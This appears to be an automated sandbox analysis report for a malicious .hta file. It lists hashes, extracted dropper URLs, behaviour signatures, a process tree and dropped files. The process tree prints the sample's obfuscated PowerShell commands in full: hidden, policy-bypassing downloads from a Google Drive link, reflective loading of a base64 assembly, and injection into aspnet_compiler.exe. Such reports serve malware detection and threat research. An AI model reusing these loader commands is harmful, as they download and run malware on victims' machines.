Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08/11/2024, 03:53

General

  • Target

    d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta

  • Size

    207KB

  • MD5

    21bf484c8fe4564e1f0e0fc0aa522199

  • SHA1

    0bda2d5048d1555ef9ef50f4fd192c0838677c94

  • SHA256

    d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6

  • SHA512

    1dbf4a2f78b482b6d80eb48c9c2434a8907081a468c820ad9085fcede6134fe41c8c27a3e8f2ad7fa3f1d702e2b0904d885bfda8300ced9c4924c6e869e9baea

  • SSDEEP

    96:43F97gSlqxRtwJPcEI/MOoMQbvfhKGAfQ:43F1OxvmUxevfU3Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 34 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4744
    • C:\Windows\SysWOW64\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe
      "C:\Windows\SySTEM32\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe" "poWErSheLl.EXe -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT ; iEx($(IEX('[SYStEm.tExT.eNCoDiNG]'+[CHAR]58+[chAR]58+'UTf8.GEtSTRinG([SYSTem.convERT]'+[char]58+[char]0x3a+'FRoMbaSe64string('+[chAr]34+'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'+[ChAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2476
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp" "c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4816
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('1jgim'+'ageUrl = 5bJhttps:/'+'/drive.google.c'+'om/uc?export=download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 5bJ;1jgwebClient = Ne'+'w-Object System.Net.WebClient;1j'+'gimageBytes = 1jgwebClient.DownloadData(1jgimageUrl);1jgimageText = [System.Text.Encoding]:'+':UTF8.GetString(1jgimageBy'+'tes);1jgstartFlag = '+'5bJ<<BASE64_START>>5bJ;1jgendFlag = 5bJ<<'+'BASE64_END>>5bJ;1jgstartIndex ='+' 1jgimageText.'+'I'+'ndexOf(1jgstartFlag);1jgendIndex = 1jgi'+'mageText.IndexO'+'f(1jgendFlag);1jgstartIndex -ge '+'0 -and 1jgendIndex -gt 1jgstartIndex;1jgstartIndex += 1jgstartFlag.Length;1jgbase64'+'Length = 1jgendIndex - 1jgstartIndex;1jgba'+'se64Command = 1jgimageText.Substring'+'(1jgstartIndex, 1jgbase64Length);1jgbase64Reve'+'rsed = -join (1jgbase64Comma'+'nd.ToCharArray() 15n ForEach-Object { 1jg_ })[-1..-(1jgbase64Command.Length)];1jgcommandBytes = [System.Convert]::FromBase6'+'4String(1jgbase64Reversed);1jgloadedAssembly = [System.Reflection.Assembly]:'+':Load(1jgcommandBytes);1jgvaiMethod = [dnlib.IO.Home].GetMethod(5bJVAI5bJ);1jgvaiMetho'+'d.Invoke(1jgnull, @(5bJtxt.FCDRW/97/32.4.371.701//:ptth5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ, 5b'+'Jdesativado5bJ, 5bJaspnet_compiler5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJ15bJ,5bJdesativado5bJ));').ReplacE('5bJ',[STrINg][ChaR]39).ReplacE(([ChaR]49+[ChaR]53+[ChaR]110),[STrINg][ChaR]124).ReplacE(([ChaR]49+[ChaR]106+[ChaR]103),'$')| & ((gv '*mdr*').naMe[3,11,2]-JOIN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2744
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              6⤵
                PID:3648
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                6⤵
                  PID:4204
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  6⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:720
        • C:\Windows\SysWOW64\ieUnatt.exe
          "C:\Windows\SysWOW64\ieUnatt.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:724
          • C:\Program Files\Mozilla Firefox\Firefox.exe
            "C:\Program Files\Mozilla Firefox\Firefox.exe"
            3⤵
              PID:440

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\poWERSHElL.EXe.log

          Filesize

          2KB

          MD5

          3d086a433708053f9bf9523e1d87a4e8

          SHA1

          b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

          SHA256

          6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

          SHA512

          931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          12KB

          MD5

          ce1bcfc9190c6cfda08148fb743882a2

          SHA1

          23a4d112625e8691f4347f3b281fe3b14ad15e92

          SHA256

          b66a07448dc9682b36c3f6ee59fd713a98fb78af01d20ba6faf6b19412ce1556

          SHA512

          862da3622fb6ff94e70da2b7efd139eeab8041fb911777f5140a8a9d3d3020d64a5d48dbfbb27ad9e20baa66c8fb2b309ea7c7f36ecb07be5c3c2a943668c0ab

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          7eb358f916ead42489c03b8d0e109df4

          SHA1

          1cb6bbf55dec6ff98dd9064704d5329384472caf

          SHA256

          207ed2190f1c5d0bad439c5c09ea1129c14f71edbdc922468dee9b960bce8d9f

          SHA512

          5641ea86ebd53afb29e28d5b63f825636dc1855f4ed1d52f8a302ab7b8c5abe3f2f661ba80cdc2a9cba250a0088d3e0c7620ae88e5d9ae64fd7dae1cfb84b178

        • C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.dll

          Filesize

          3KB

          MD5

          e32db995d7c04aa9abc2adb3cb78e3b6

          SHA1

          c761f8e511f66e5cc2cf4fba9096ae8be53d0dac

          SHA256

          2b97843d7061a685d3a58b55ece4a03031f64f3b818622776f2050251adb8bda

          SHA512

          ffcf13696ba920be2eac92bacc60fb9975200d1c8343946a6907588fa966bca84dcb375c236fa7682740550e528f29a5ebd3377e6c7ab67988e9e01c8aadfb93

        • C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp

          Filesize

          1KB

          MD5

          5ac3e7b2c8b665309085844070338689

          SHA1

          d227ed68e70ffd96cdb3205ee8c8cf9501e9511a

          SHA256

          dff206519b65ae94d2078dcf7db3378911060aa2598f309ccaef16b316768b44

          SHA512

          81b017d2f40d60d2022d0409bcd62a04ac35f607b6499e8880fc3b4d83e7d0aa215b27bff8503a61d09cf939b5d83a714d897d0c33ccf307b81f9f101820201c

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tinfclgi.1a0.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs

          Filesize

          138KB

          MD5

          3a172f4d749a3cf2a42e0b7df638c8d3

          SHA1

          071d3b7db5a649ec3252af5b5a21ed047e71c785

          SHA256

          fe03066a9d3659d5f1e5941c7a73646780d55d15a57a9dde5901f469db2ead72

          SHA512

          30cc1c96d8cae17800f33f63d7ef8965536051ee7ec683b45e5c62079bf9487785ccc9b8ae8ab073f25f9059f1bbf84f73f8c8ff68c807c0e7007d597dced0d7

        • \??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.0.cs

          Filesize

          480B

          MD5

          02801ca1be5cf5616a9f398c85c263db

          SHA1

          e9000f0b5cd0dceb296fb59f9ed2c85717666377

          SHA256

          6d63144887d63ca3c8794b18c2e2283a7f5e6fdc5355fb24c0c3e7d11a172586

          SHA512

          4a27658c15203dd2122759a70db7f2917eb7a8899f9590f80a01b95d55a0631d0fce21d1ca6c9ec4111aabb7d9bdb9396f6483e42bb10850e9a9305d21616902

        • \??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline

          Filesize

          369B

          MD5

          9f189319c7026f4c8c2bc274b31dcbc1

          SHA1

          3d7cf616092e9342ffe58dbf0141a5e897c0c821

          SHA256

          4c87877673281431e8360baad648f64cdd3492b8959830f13c4350c0ce5ea398

          SHA512

          f017ba488a6104f6eeed822944c73a5d3e69b214efe71a53876e1fd1fa4fb331d3d0cc64af14daa7b871ab357bce5047efd8a01942e153a66c7765360a3e6fba

        • \??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP

          Filesize

          652B

          MD5

          f26b3a26ab9c4a46fde242aaaca9a332

          SHA1

          2dbb75a8f5c366597503e49e17225fea551e4aef

          SHA256

          6c13e7351b8e2dab0b4ca221f593ca473762d9b78d1bfb3a0d3f6c8e1f662270

          SHA512

          9531d901c1958a367bcf0f0426f30035f7ef681dcb94a12bd3bce25cbc92af4f35a3625382e3f57eb7baa5158fbde5b64e35beaad82199eae18aee4daa07e135

        • memory/440-117-0x0000023B33A20000-0x0000023B33B37000-memory.dmp

          Filesize

          1.1MB

        • memory/720-104-0x0000000000400000-0x0000000000446000-memory.dmp

          Filesize

          280KB

        • memory/724-108-0x0000000000800000-0x0000000000843000-memory.dmp

          Filesize

          268KB

        • memory/724-109-0x0000000000800000-0x0000000000843000-memory.dmp

          Filesize

          268KB

        • memory/2476-29-0x00000000078D0000-0x0000000007902000-memory.dmp

          Filesize

          200KB

        • memory/2476-41-0x0000000007910000-0x00000000079B3000-memory.dmp

          Filesize

          652KB

        • memory/2476-42-0x0000000008090000-0x000000000870A000-memory.dmp

          Filesize

          6.5MB

        • memory/2476-43-0x0000000007A40000-0x0000000007A5A000-memory.dmp

          Filesize

          104KB

        • memory/2476-44-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

          Filesize

          40KB

        • memory/2476-45-0x0000000007CD0000-0x0000000007D66000-memory.dmp

          Filesize

          600KB

        • memory/2476-46-0x0000000007C40000-0x0000000007C51000-memory.dmp

          Filesize

          68KB

        • memory/2476-47-0x0000000007C70000-0x0000000007C7E000-memory.dmp

          Filesize

          56KB

        • memory/2476-48-0x0000000007C80000-0x0000000007C94000-memory.dmp

          Filesize

          80KB

        • memory/2476-49-0x0000000007D90000-0x0000000007DAA000-memory.dmp

          Filesize

          104KB

        • memory/2476-50-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

          Filesize

          32KB

        • memory/2476-40-0x00000000078B0000-0x00000000078CE000-memory.dmp

          Filesize

          120KB

        • memory/2476-30-0x000000006D480000-0x000000006D4CC000-memory.dmp

          Filesize

          304KB

        • memory/2744-103-0x0000000007E60000-0x0000000007EFC000-memory.dmp

          Filesize

          624KB

        • memory/2744-102-0x0000000007D00000-0x0000000007E58000-memory.dmp

          Filesize

          1.3MB

        • memory/2892-91-0x0000000005B60000-0x0000000005EB4000-memory.dmp

          Filesize

          3.3MB

        • memory/3824-81-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-19-0x0000000005C30000-0x0000000005C7C000-memory.dmp

          Filesize

          304KB

        • memory/3824-72-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-73-0x0000000006F60000-0x0000000006F82000-memory.dmp

          Filesize

          136KB

        • memory/3824-74-0x0000000008010000-0x00000000085B4000-memory.dmp

          Filesize

          5.6MB

        • memory/3824-13-0x00000000055C0000-0x0000000005914000-memory.dmp

          Filesize

          3.3MB

        • memory/3824-7-0x0000000005550000-0x00000000055B6000-memory.dmp

          Filesize

          408KB

        • memory/3824-6-0x00000000054E0000-0x0000000005546000-memory.dmp

          Filesize

          408KB

        • memory/3824-71-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

          Filesize

          4KB

        • memory/3824-18-0x0000000005BA0000-0x0000000005BBE000-memory.dmp

          Filesize

          120KB

        • memory/3824-65-0x0000000006160000-0x0000000006168000-memory.dmp

          Filesize

          32KB

        • memory/3824-0-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

          Filesize

          4KB

        • memory/3824-5-0x0000000005390000-0x00000000053B2000-memory.dmp

          Filesize

          136KB

        • memory/3824-4-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-2-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-3-0x0000000004CF0000-0x0000000005318000-memory.dmp

          Filesize

          6.2MB

        • memory/3824-1-0x00000000045E0000-0x0000000004616000-memory.dmp

          Filesize

          216KB

        • memory/4744-110-0x0000000005480000-0x0000000005564000-memory.dmp

          Filesize

          912KB